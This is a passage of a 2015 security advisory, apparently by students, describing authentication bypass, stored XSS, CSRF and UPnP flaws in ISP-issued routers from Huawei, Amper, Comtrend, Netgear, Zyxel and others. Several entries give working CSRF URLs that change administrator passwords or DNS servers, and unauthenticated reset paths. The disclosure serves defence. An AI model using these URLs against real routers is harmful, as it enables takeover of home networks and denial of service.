In order to do so, the attacker only needs to access the router IP followed by the 9000 port.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify the WPS configuration   
by using the supported Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the WPS configuration or   
resetting the AP to default settings.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Huawei  
Model: HG553  
Tested firmwares: V100R001C03B043SP01  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP followed by the 9000 port.  
  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Bypass Authentication ----------------------------------  
* Description: An external attacker, without requiring any login process, is able   
to reset the router settings to default ones besides bringing a   
permanent denial of service attack on.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)  
  
* PoC:  
Without requiring any login process, an attacker is able to bring on a permanent denial of   
service by constantly accessing the /rebootinfo.cgi URL.  
  
The attacker is also able to force the router to reset to default configuration settings by   
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router   
by using the default credentials.  
  
In both attacks, router replies with HTTP 400 status code, but either the reboot or the   
configuration reset is being correctly executed.  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code   
injection.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
I.e., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Huawei  
Model: HG556a  
Tested firmwares: V100R001C10B077  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP followed by the 9000 port.  
  
--------------------------------------------------------------------------------------------  
  
--------------------------------- Bypass Authentication ----------------------------------  
* Description: An external attacker, without requiring any login process, is able   
to reset the router settings to default ones besides bringing a   
permanent denial of service attack on.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)  
  
* PoC:  
Without requiring any login process, an attacker is able to bring on a permanent denial of   
service by constantly accessing the /rebootinfo.cgi URL.  
  
The attacker is also able to force the router to reset to default configuration settings by   
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router   
by using the default credentials.  
  
In both attacks, router asks for username-password and returns HTTP 401 status code   
(unauthorized), but after multiple requests are sent, it replies with HTTP 400 status code   
and executes the action.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
I.e., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code   
injection.   
The script execution can be clearly seen within different subdirectories such as   
diagnostic.htm and config_wifi.htm.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121777 (http://osvdb.org/show/osvdb/121777)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the Dispositivos Conectados (Connected Devices)   
table.  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Astoria  
Model: ARV7510  
Tested firmwares: 00.03.41  
Comments: Common router that ISP Vodafone used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
---------------------------- USB Device Bypass Authentication ----------------------------  
* Description: An external attacker, without requiring any login process, is able   
to view, modify, delete and upload new files to the USB storage   
device connected to the router.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121773 (http://osvdb.org/show/osvdb/121773)  
  
* PoC:  
If a USB storage device is hooked up to the router, an external attacker is able to   
download, modify the content and upload new files, without requiring any login process.  
  
In order to do so, the attacker only needs to access the router IP followed by the 9000 port.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and  
OSVDB-121888 (http://osvdb.org/show/osvdb/121888)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
I.e., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Amper  
Model: ASL-26555  
Tested firmwares: v2.0.0.37B_ES  
Comments: Common router that Spanish ISP Telefónica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and  
OSVDB-121771 (http://osvdb.org/show/osvdb/121771)  
  
* PoC:  
Besides the main web configuration interface (port 80), there is a much more advanced one   
on port 8000 in which every input field is vulnerable to CSRF.  
  
I.e., if an attacker wants to change the DNS servers, he may use the following URL to do   
so once the victim opens the link:   
http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS  
  
It is also possible for an attacker to change the default router administrator password by   
sending the victim this URL: (URL is omitted due to size reasons)  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121772 (http://osvdb.org/show/osvdb/121772)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)   
subdirectory allows script code injection. The vulnerable input field is found into the   
basic web interface on port 80.  
  
The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory,   
into the advanced web interface on port 8000.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the Connected Clients table (Setup->Local Network).  
Once the victim views this list, the script is executed.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: AR-5387un  
Tested firmwares: A731-410JAZ-C04_R02  
Comments: Common router that ISP Jazztel used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection.  
  
The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter   
subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP).  
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Netgear  
Model: CG3100D  
Tested firmwares: v1.05.05  
Comments: Common router that ISP ONO used to give away to their customers  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121795 (http://osvdb.org/show/osvdb/121795)  
  
* PoC:  
Every input field is vulnerable to CSRF.  
  
An attacker may code a malicious website which triggers a POST request to the victim’s   
router. When a website with that code is accessed, the POST request is sent and the attack   
is done.  
  
It is also possible for an attacker to reset the victim’s router to default settings by   
using custom source code.  
  
(Source codes have been omitted due to size reasons).  
  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121780 (http://osvdb.org/show/osvdb/121780)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name)   
subdirectory allows script code injection.  
  
The script execution can be clearly seen within different subdirectories such as   
Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del   
router (Advanced->Router status).  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: VG-8050  
Tested firmwares: SB01-S412TLF-C07_R03   
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection.  
  
The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter   
subdirectories.  
  
--------------------------------------------------------------------------------------------  
  
-------------------------- Unauthenticated Cross Site Scripting --------------------------  
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to   
inject malicious code within the router configuration website by   
sending a DHCP Request PDU.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)  
  
* PoC:  
An external attacker is able to inject malicious code within the router website without   
requiring any login process.  
This is achieved by sending a DHCP Request PDU containing the malicious script within the   
hostname parameter.  
  
The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP).  
Once the victim views this list, the script is executed.  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Zyxel  
Model: P 660HW-B1A  
Tested firmwares: 3.10L.02  
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
----------------------------- Persistent Cross Site Scripting ----------------------------  
* Description: Some input fields within the router website are vulnerable to   
Cross-site Scripting (XSS) attacks, allowing an attacker to execute   
malicious code.  
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121796 (http://osvdb.org/show/osvdb/121796)  
  
* PoC:  
Despite the fact that most of the input fields do not allow special characters to be   
written in, there are still some of them in which a XSS can be performed.  
  
I.e., the Hostname field within the Dynamic DNS subdirectory allows script code   
injection.  
  
--------------------------------------------------------------------------------------------  
  
------------------------------- Cross Site Request Forgery -------------------------------  
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within   
the router website allow an external attacker to carry out actions   
such as changing the administrator password.   
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.  
OSVDB-121797 (http://osvdb.org/show/osvdb/121797)  
  
* PoC:  
Every input field is vulnerable to Cross Site Request Forgery attacks.  
  
I.e., if an attacker wants to change the administrator password, he may use the following   
URL to do so once the victim opens the link:   
http://192.168.1.1/password.cgi?sysPassword=newpassword  
============================================================================================  
  
  
============================================================================================  
Manufacturer: Comtrend  
Model: 536+  
Tested firmwares: A101-220TLF-C35  
Comments: Common router that Spanish ISP Telefonica used to give away to their   
customers  
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has   
lots of weaknesses, such as the lack of an authentication process, which can be exploited   
by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
============================================================================================  
Manufacturer: D-Link  
Model: DIR-600  
Tested firmwares: PV6K3A8024009  
Comments:   
--------------------------------------------------------------------------------------------  
  
-------------------------------- Universal Plug and Play ---------------------------------  
* Description: An unauthenticated attacker is able to modify firewall rules and   
carry out a persistent denial of service by using the supported   
Universal Plug and Play protocol.  
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.  
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)  
  
* PoC:  
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This   
protocol has lots of weaknesses, such as the lack of an authentication process, which can   
be exploited by attackers.  
  
The device supports multiple UPnP actions, such as changing the firewall rules   
(AddPortMapping) or the termination of any WAN connections (ForceTermination).  
  
These actions allow an attacker to carry out a persistent denial of service (router needs   
to be factory reset to work properly again) or open critical ports, even for remote hosts   
which are not into the LAN.   
============================================================================================  
  
  
We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master).  
  
Greetings,  
Jose Antonio Rodriguez Garcia  
Alvaro Folgado Rueda  
Ivan Sanz de Castro.  
`